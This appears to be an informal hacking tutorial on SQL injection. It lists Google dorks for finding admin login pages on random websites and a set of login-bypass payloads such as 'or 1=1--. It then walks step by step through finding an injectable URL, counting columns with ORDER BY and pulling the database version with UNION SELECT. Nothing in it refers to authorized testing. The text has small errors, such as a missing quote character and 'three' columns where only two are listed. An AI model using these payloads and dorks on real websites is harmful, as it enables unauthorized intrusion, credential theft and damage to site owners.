Sqli Fully Explained

What is SQL Injection?
SQL injection attack is a code injection technique or method, which is used to attack data driven applications. In this attack, malicious SQL statements are inserted in entry field for execution. SQL injection attack (SQLIA) is considered one of the top web application vulnerabilities. By using SQL Injection method it is very easy to hack vulnerable website. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

Using SQL Injection attack method an attacker can get complete DB of website and User ID and Password can be exploded, an attacker can also Shut down My SQL Server and Server will stop working. An attacker can modify content of website and bypass login.

Requirements :-
• SQL Injection Dorks.
• Vulnerable Website.
• Firefox with Hack bar add-on.
• Little bit understanding of SQL
• Fresh Mind to Understand it.

Step 1. Find Vulnerable website.
An attacker always use Google, Bing or Yahoo search engine for searching SQL Injection Vulnerable websites using Dorks. (SQL Injection vulnerable URL is called Dorks which can be easily found in SQL Injection Vulnerable Website URL)
First you search the admin page of vulnerable web site. For searching vulnerable web page you take the help of google . Open your google page and use following script.Use any one of the following…
► “inurl:admin.asp”
► “inurl:login/admin.asp”
► “inurl:admin/login.asp”
► “inurl:adminhome.asp”
► “inurl: admin.php”
► “inurl: login/admin.php”
► “inurl: admin/login.php”
► “inurl: login/administrator.php”
Now you can use the following code and inject into user id and password field. For user id used admin as user id.
And in password field use one one of the following code and some times these codes are also used for both user id as well as password.

• test’or1–
• ‘or 1=1#
• 1’or’1’=’1
• ‘)or1=1—
• ‘or ” = ‘
• ‘or’1’=’1
• ‘ or ‘1’=’1
• ‘ or 0=0 —
• ” or 0=0 —
• or 0=0 —
• ‘ or 0=0 #
• ‘or’ ‘=’
• ‘or’1=1’
• “) or (“a”=”a
• ‘) or (‘a’=’a
• ” or “a”=”a
• ‘ or a=a–
• or 1=1–
• ” or 1=1–
If found no luck with this method then try given below.

How to Check for Vulnerability.
To Check the Vulnerability put sigle Quote ( ) at the end of the website URL and Hit Enter.If the page remains same or Not found then its not vulnerable and if the page shows Error like this :-
An error occurred...You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near /contentPage.php?id=8 at line 1
This means the website is vulnerable to SQL Injection.

Step 2. Find the number of Columns.
Wooo hoo hoo !! We found SQL Injection Vulnerable webstie now its time to find no. of Columns present in the Database.
To do that replace that one single quote ( ) with Order By no. Statement until you find the Error message.
Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like Unknown Column
Example:
www.targetwebsite.com/index.php?id=8 Order by 1
If you get an Error on Order by 9 that means the DB have 8 number of Columns

Step 3. Find the Vulnerable Column.
Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query Union Select columns_sequence.

And also change the ID Value to Negative, I mean Suppose the website have this URL index.php?id=8 Change it to index.php?id=-8. Just put minus sign -before ID.

For Eg. If the Number of Column is 11 then the query is as follow :-

www.targetwebsite.com/index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11-- ✔ And Once if the Query has been Executed then it will display the number of Column. Yeahh.... !!

In the Above result, I found three vulnerable Columns 2,3

Step 4. Finding version, Database and User.
Now this time to find out website Database version and User Just replace Vulnerable Column no. with version()
For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--

And now Hit Enter